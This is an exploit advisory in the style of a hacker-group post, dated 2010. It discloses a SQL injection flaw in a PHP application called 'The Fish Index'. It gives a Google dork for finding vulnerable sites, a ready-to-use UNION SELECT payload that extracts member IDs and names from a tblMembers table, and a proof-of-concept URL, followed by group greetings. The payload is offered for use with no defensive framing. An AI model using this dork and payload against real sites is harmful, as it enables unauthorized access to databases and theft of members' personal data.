45 lines
No EOL
1.8 KiB
Text
45 lines
No EOL
1.8 KiB
Text
*************************************************************************
|
|
,
|
|
| ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . ,
|
|
| --- | | | | | |---' | | | |---' | | |
|
|
| `---' `---| `---' `---' ` `---' ` `---' `---`---
|
|
` `---'
|
|
*************************************************************************
|
|
[V] Member ID The Fish Index PHP SQL Injection Vulnerability
|
|
|
|
--==[ Author ]==--
|
|
|
|
[+] Author : v4lc0m87
|
|
[+] Contact : valcom87[at]gmail[dot]com
|
|
[+] Group : INDONESIAN CYBER
|
|
[+] Site : http://indonesian-cyber.org/
|
|
[+] Date : June, 3-2010 [INDONESIA]
|
|
|
|
*************************************************************************
|
|
--==[ Details ]==--
|
|
|
|
[+] Vulnerable : SQL Injection
|
|
[+] Google Dork : inurl:index.php?myPlantId=
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
[-] Exploit :
|
|
[+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
|
|
|
|
[-] Remote SQLi p0c :
|
|
[+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
|
|
|
|
[V] Greetz :
|
|
SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk)
|
|
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
|
|
Bocah tua nakal (mbah l4mpor,awchoy)
|
|
flyff666 cruz3N petimati spykit v3n0m uzanc
|
|
kokoh wisdom (di FB koq curhat mlu sih koh :p)
|
|
blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)
|
|
[K]urabu[S]aru [RnR] cO2 community
|
|
and y0u !! |